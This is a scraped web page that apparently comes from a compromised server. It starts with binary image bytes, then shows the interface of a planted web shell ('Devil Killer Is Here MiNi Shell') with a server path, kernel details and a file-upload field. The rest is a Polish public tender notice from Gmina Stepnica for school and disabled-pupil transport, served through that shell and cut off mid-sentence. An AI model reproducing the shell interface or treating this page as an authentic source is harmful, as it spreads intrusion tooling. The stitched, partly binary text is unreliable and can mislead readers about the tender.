JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250702/0030367201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewozy szkolne w ramach regularnej komunikacji zbiorowej oraz dzieci z niepełnosprawnościami w okresie od 1 września 2025 r. do 30 czerwca 2027 r. na terenie Gminy Stepnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stepnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684338</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Kościuszki 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stepnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-112</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@stepnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.stepnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewozy szkolne w ramach regularnej komunikacji zbiorowej oraz dzieci z niepełnosprawnościami w okresie od 1 września 2025 r. do 30 czerwca 2027 r. na terenie Gminy Stepnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b46612bc-4cbe-4600-b4d4-9cfb8cfd41eb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00303672</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00039019/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przewozy szkolne w ramach regularnej komunikacji zbiorowej w roku od 1 września 2025 r. do 30 czerwca 2026 r. na terenie Gminy Stepnica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://stepnica.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://stepnica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu platformy komercyjnej Marketplanet https://stepnica.ezamawiajacy.pl,<br/>2. Wykonawca w celu złożenia oferty w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na https://stepnica.ezamawiajacy.pl.<br/>3. Złożenie oferty, pod rygorem nieważności następuje w formie elektronicznej wyłącznie za<br/>pośrednictwem dedykowanego formularza pn. „Formularz do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na https://stepnica.ezamawiajacy.pl,<br/>4. Celem skrócenia czasu udzielania odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje<br/>przekazywane są w formie elektronicznej za pośrednictwem https://stepnica.ezamawiajacy.pl i<br/>formularza „Wyślij wiadomość do zamawiającego”.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Instrukcji użytkowania sytemu https://stepnica.ezamawiajacy.pl.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>7. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. Z 2020r., poz. 2452);<br/>Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. Z 2020r., poz. 2415).<br/>8. Osobami upoważnionymi ze strony Zamawiającego do porozumiewania się z Wykonawcami są w<br/>kwestiach formalnych: Pani Marlena Smolarek, w godzinach pracy Urzędu. Jednocześnie<br/>Zamawiający informuje, że przepisy ustawy PZP nie pozwalają na jakikolwiek inny kontakt – zarówno z<br/>Zamawiającym jak i osobami uprawnionymi do porozumiewania się z Wykonawcami – niż wskazany w<br/>niniejszym rozdziale SWZ. Oznacza to, że Zamawiający nie będzie reagował na inne formy<br/>kontaktowania się z nim, w szczególności na kontakt telefoniczny lub/i osobistyw swojej siedzibie.<br/>9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia:<br/>1) akceptuje warunki korzystania z platformy https://stepnica.ezamawiajacy.pl określone w<br/>Regulaminie platformy,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnych na platformie.<br/>10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z platformy https://stepnica.ezamawiajacy.pl.<br/>11. Zalecenia<br/>1) formaty plików wykorzystywanych przez wykonawców powinny być zgodne z<br/>„OBWIESZCZENIAPREZESA RADY MINISTRÓW z dnia 9 listopada 2017r. w sprawie ogłoszenia<br/>jednolitego tekstu<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych.”,<br/>2) zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf,<br/>3) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów<br/>.zip lub .7Z,<br/>4) wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. Pozostałe warunki z uwagi na brak miejsca w systemie umieszczono w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Urząd Miasta i Gminy w Stepnicy, 72-112<br/>Stepnica, ul. T. Kościuszki 4, reprezentowany przez Burmistrza Miasta i Gminy w Stepnicy,<br/>2. Kontakt do Inspektora Ochrony Danych – iod@stepnica.pl, tel. 504707087.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z zapytaniem ofertowym dotyczącym przedmiotowego postępowania.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust. 1 Ustawy z dnia 11 września<br/>2019r. Prawo zamówień publicznych (zw. dalej ustawą PZP).<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy PZP.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Posiada Pani/Pan:<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych.<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO<br/>9. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje o ograniczeniach stosowania<br/>przepisów RODO o których mowa w art.19 ust 2 i 3 ustawy Pzp, a mianowicie:<br/>a) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art.16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp;<br/>b) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art.18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AOŚ.271.15.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć 1<br/>Przedmiotem zamówienia są przewozy dzieci, do Szkoły Podstawowej im. ks. J. Twardowskiego w Racimierzu, Zespołu Szkolno - Przedszkolnego im. Konstantego Maciejewicz w Stepnicy w roku szkolnym 2025/2026 i 2026/2027 na podstawie biletów miesięcznych szkolnych (ulgowych). Przewidywana liczba biletów 61 szt. w jednym roku szkolnym.<br/>Przewozy obejmują wyjazd ze wskazanego przez zamawiającego miejsca, przejazd wyznaczoną trasą, przybycie do wyznaczonej szkoły w odpowiednim czasie przed rozpoczęciem zajęć lekcyjnych, oraz odwiezienie uczniów po zajęciach do miejscowości w których mieszkają. Wyszczególnienie tras i godzin dowozu i odwozu do szkół oraz liczbę uczniów przedstawia harmonogram przewozów szkolnych na terenie Gminy Stepnica od 1 września 2025 r. do 30 czerwca 2027 r. stanowiący załącznik nr 1a do specyfikacji.<br/>Wykonawca świadczyć będzie usługi własnymi środkami transportu nie starszymi niż 2017 rok produkcji, które spełniają wszelkie wymogi do przewozu dzieci. Dowóz realizowany musi być co najmniej 2 autobusami rano jak i w godzinach popołudniowych. Wykonawca zapewni min. 2 kierowców posiadających stosowne uprawnienia. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć, wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym przez zamawiającego. <br/>Przewóz realizowany będzie w oparciu o utworzone przez Wykonawcę i zaakceptowane przez Zamawiającego linie komunikacji regularnej – komercyjnej z pierwszeństwem przejazdu dla posiadaczy biletów miesięcznych. Wymaga się, aby wszystkim przewożonym uczniom szkół podstawowych w Racimierzu i Stepnicy zapewniono miejsca siedzące.<br/>Linie komunikacji regularnej muszą być ułożone w sposób umożliwiający uczniom przejazd z miejsca zamieszkania do placówki oświatowej oraz powrót do miejsca zamieszkania w dni nauki szkolnej przy zachowaniu norm bezpieczeństwa obowiązujących w zakresie transportu drogowego osób, a także dostosowaniu liczby kursów oraz pojemności (liczby miejsc) pojazdów na poszczególnych trasach do ilości przewożonych osób. Szczegółowy opis tras z ilością dowożonych osób stanowi załącznik nr 1a do SIWZ.<br/>Zamawiający dopuszcza możliwość zmiany ilości dowożonych dzieci w zakresie odwozu i dowozu w ilości +/- 5%.<br/>W przypadku awarii autobusu/autobusów Wykonawca zapewnia niezwłocznie (maksymalnie do 90 minut) transport zastępczy spełniający wymagania określone w niniejszej SWZ. W przypadku niemożności zrealizowania transportu zastępczego w w/w. czasie, Wykonawca niezwłocznie powiadomi o tym Zamawiającego oraz zorganizuje przewóz przez inny podmiot na swój koszt. Zastępczy przewóz przez inny podmiot na koszt Wykonawcy może być również zorganizowany przez Zamawiającego. Przekroczenie ww. terminu bez względu na to kto zrealizował przewóz zastępczy, jest podstawą do uznania, iż Wykonawca nie wykonał bądź nienależycie wykonał swoje zobowiązanie.<br/>W przypadku zwiększenia ilości dowożonych uczniów Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie. Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat z tego tytułu.<br/>Zamawiający zapewni osoby odpowiedzialne za kompleksową opiekę nad dziećmi podczas dowozu oraz odwozu (po min. 1 osobie w każdym autobusie).<br/>Zamawiający ponosi wszelkie koszty związane z zapewnieniem należytej opieki podczas wykonania usługi (koszty zatrudnienia opiekunów).<br/>Przewóz dzieci na poszczególnych trasach odbywał się będzie na podstawie indywidualnych biletów miesięcznych.<br/>Szczegółowy zakres określają następujące załączniki do SIWZ:<br/>Harmonogram przewozów szkolnych na terenie Gminy Stepnica od 1 września 2025 r. do 30 czerwca 2027 r. stanowiący – załącznik nr 1a do SIWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2027-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert złożonych w postępowaniu na podstawie następujących kryteriów oceny:<br/>Dla części 1 i 2<br/>1)	cena oferty brutto - 60%; oferta będzie oceniana wg następującego wzoru:<br/>C min<br/>Kc = ------------------- x 60<br/>C bad<br/>gdzie:<br/>K c – kryterium cenowe<br/>C min – cena najtańszej oferty <br/>C bad – cena badanej oferty <br/>Dla porównania ofert pod względem kryterium cenowego Zamawiający przyjmuje cenę ofertową brutto;<br/>2)	jakość – czas podstawienia pojazdu zastępczego w razie awarii pojazdu (od wystąpienia awarii) waga 40% maksymalnie 40 punktów do zdobycia. <br/>J - liczba punktów przyznanych Wykonawcy w kryterium jakość:<br/>a)	czas podstawienia pojazdu zastępczego do 30 min. od wystąpienia awarii – 40 pkt,<br/>b)	czas podstawienia pojazdu zastępczego od 31 min. do 60 min. od wystąpienia awarii – 20 pkt,<br/>c)	czas podstawienia pojazdu zastępczego od 61 min. do 90 min. od wystąpienia awarii – 0 pkt<br/>Ocenie zostanie poddany aspekt jakościowy. Czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 min. W formularzu ofertowym należy podać czas podstawienia autobusu zastępczego w przedziałach powyżej, poprzez skreślenie niepotrzebnych przedziałów czasowych. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona jako niezgodna z SIWZ. W przypadku nie wskazania przez Wykonawcę czasu w ofercie, Zamawiający przyjmie czas 30 min. Punkty w ramach tego kryterium zostaną przyznane na podstawie wypełnionego przez Wykonawcę oświadczenia w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ. <br/>2.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą ilość punktów w skali 100 punktowej obliczonych wg następującego wzoru:<br/>X= Kc+J<br/>gdzie:<br/>X	-	ilość punktów badanej oferty;<br/>Kc	-	ilość punktów badanej oferty w kryterium cena ;<br/>J	-	ilość punktów badanej oferty w kryterium jakość<br/>3. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">– czas podstawienia pojazdu zastępczego w razie awarii pojazdu (od wystąpienia awarii) waga 40%</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2<br/>Przedmiotem zamówienia jest dowóz uczniów z niepełnosprawnościami z terenu Gminy Stepnica wraz z zapewnieniem wykwalifikowanej opieki do placówki oświatowej OREW Profi-Med w Goleniowie ul. Konopnickiej 10A oraz do Zespołu Szkół Specjalnych w Goleniowie ul. Niepodległości 1B i z powrotem w roku szkolnym 2025/2026 i 2026/2027. Przewidywana liczba dzieci: 18 w tym: 1 uczeń z m. Czarnocin, 2 uczniów z m. Żarnowo, 5 uczniów z m. Łąka, 1 uczeń z m. Jarszewko, 1 uczeń z m. Widzieńsko, 7 uczniów z m. Stepnica i 1 uczeń z m. Kopice. (Ilość dzieci obejmuje 1 rok szkolny) Trasa przewozu powinna być w miarę możliwości najkrótszym odcinkiem drogi pomiędzy placówką, a miejscem zamieszkania ucznia. Wykonawca dostosuje godziny dowożenia uczniów do godzin rozpoczęcia i zakończenia 